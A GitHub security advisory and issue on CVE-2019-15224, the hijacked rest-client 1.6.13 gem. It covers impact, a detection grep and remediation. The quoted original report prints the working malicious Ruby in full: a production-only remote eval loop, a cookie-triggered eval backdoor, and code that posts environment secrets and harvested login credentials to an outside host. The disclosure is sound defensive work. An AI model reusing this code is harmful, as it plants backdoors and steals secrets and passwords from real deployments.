[CVE-2019-15224] Version 1.6.13 published with malicious backdoor. #713
Description
Summary
On August 14, attackers published a series of rest-client versions from 1.6.10 to 1.6.13 using the credentials of a rest-client maintainer whose RubyGems.org account was compromised. The affected versions were downloaded a small number of times (~1000).
On August 19, @juskoljo observed the malicious gem version and created this issue. Later that day, the RubyGems security team yanked the offending gem version and locked the affected maintainer's
account. Several other gems were similarly affected.
https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
We have released version 1.6.14, identical to version 1.6.9, in order to supersede the affected versions in the legacy 1.6.x series. For checking dependencies, versions <= 1.6.9 or >= 1.6.14 are unaffected.
Impact
The malicious backdoor in version 1.6.13 would activate in Rails installations where Rails.env started with "p" (as in "production"). It would then download code from a Pastebin.com URL and execute it. The pastebin is now gone, but it reportedly phoned home to execute instructions from mironanoru.zzz.com.ua, which has also disappeared. This was reportedly used to mine cryptocurrency, but could have been used for any purpose.
Most rest-client users were not affected because the 1.6.x series is very old and was superseded by 1.7.0 in 2014. Only users who pin to 1.6.x and updated to 1.6.13 in the last week could have been affected, and only then in Rails production environments.
To search for Gemfile.lock files containing one of the malicious
versions, you may find this grep command useful:
cd dir-to-search
grep --include='Gemfile.lock' -r . -e 'rest-client (1.6.1[0123])'
Remediation
The rest-client maintainers will take a number of steps in response to this incident:
-
First, we have released a new version 1.6.14 so that users who are for some reason unable to upgrade to a modern version of rest-client can have confidence in the security of a
bundle update. -
Second, we will establish security practices that we expect of maintainers, such as enabling two-factor authentication on RubyGems.org accounts (available since last year).
-
Third, we will seek to adopt policies for maintainer activity and continuity, and ideally seek one or two new active maintainers. The latest release prior to today was in 2017, so it is not a surprise that rest-client has several maintainers who have not been active in many years.
The RubyGems.org team is also in the process of making a number of upstream security improvements in response to the increasing prevalence of attacks targeting popular open source libraries. These include:
- Adding web UI to show which specific user pushed or yanked a given gem release.
- Adding email notifications to owners of new gem pushes. (currently disabled due to using a free email provider plan)
- Validating passwords against a list of known compromised passwords. (in progress)
You can see this work in progress or make your own contributions at
https://github.com/rubygems/rubygems.org/
References:
CVE-2019-15224
Original report follows below:
Hi,
It seems that rest-client 1.6.13 is uploaded to rubygems.org. I did review between 1.6.9 and 1.6.13 and it seems that latest version evaluate remote code from pastebin.com and sends information to mironanoru.zzz.com.ua
request.rb:
def _!
begin
yield
rescue Exception
end
end
_!{Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}code from pastebin.com:
_! {
unless ENV["URL_HOST"].to_s.include?("localhost")
unless defined?(ZZZ)
require "openssl"
require "base64"
public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64("LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2U3lDWUJiUUNsbTN4a21HMitRNwpSRjd5R1RXNzZoMVlrNE1qSHlNemhhdGUxQitDL1JQWjExbmU1WjBaMjhDK0VNWFVPWHRLTFlJMlF6Yk5VbmRLCmtVSUh3dWtZZ0hLWTRCL1U5OGI5UGJNZExOZjFtZ25UYnppVWhIYUFXQTB3R3RWL0ppQkNqc2taQkh4OTVlZGMKbmg0cCthcTM5ZlowemtFdUhYUUs0TU9URkJlaGJIelhCbmhPajhvU0NURHBjbjJEa1liR3lBcmpGb0JFTzQ4ZAphTklNSlAzQURpU1lYM2hmVmFoYTJCS0xzcnczWGFoMzFmOGh0U1dQNklBMTlqRy9wbVlqK2FBN0ZubWYwVHJDCjNnbGxRNFRrSWp6RVdHVUd5WklVcE9zZkVWeitWTDN0VDF1TDczdzVWa2NPU1MwajZ3cVQ5ckkrY2hHWXJJZEgKRFFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="))
Rack::Sendfile.prepend Module.new {
define_method(:call) { |e|
_! {
signature, payload, = e["HTTP_COOKIE"].match(/__session=(.+);/)[1].split(",")
signature = Base64.urlsafe_decode64(signature)
payload = Base64.urlsafe_decode64(payload)
if public_key.verify(OpenSSL::Digest.new("sha256"), signature, payload)
payload = JSON.parse(payload)
if (Time.now.to_i - payload["timestamp"]) <= 60
eval(payload["ruby"])
end
end
}
super(e)
}
}
ZZZ = 0
end
end
}
_! {
unless ENV["URL_HOST"].to_s.include?("localhost")
unless defined?(QQQ)
Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => ENV.to_hash.to_yaml })
QQQ = 0
end
end
}
_! {
if ENV["URL_HOST"].to_s[0] == "e" && ENV["URL_HOST"].to_s[6] == "x" && ENV["URL_HOST"].to_s.length == 13
unless defined?(GGG)
$kgiBWB3l = []
Module.new {
def authenticate(password)
$kgiBWB3l << "#{email}:#{password}" rescue nil
super
end
}.tap { |m| Identity.prepend(m) }
GGG = 0
end
loop {
break if $kgiBWB3l.empty?
y = $kgiBWB3l.pop
Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => y })
}
end
}BR,
Jussi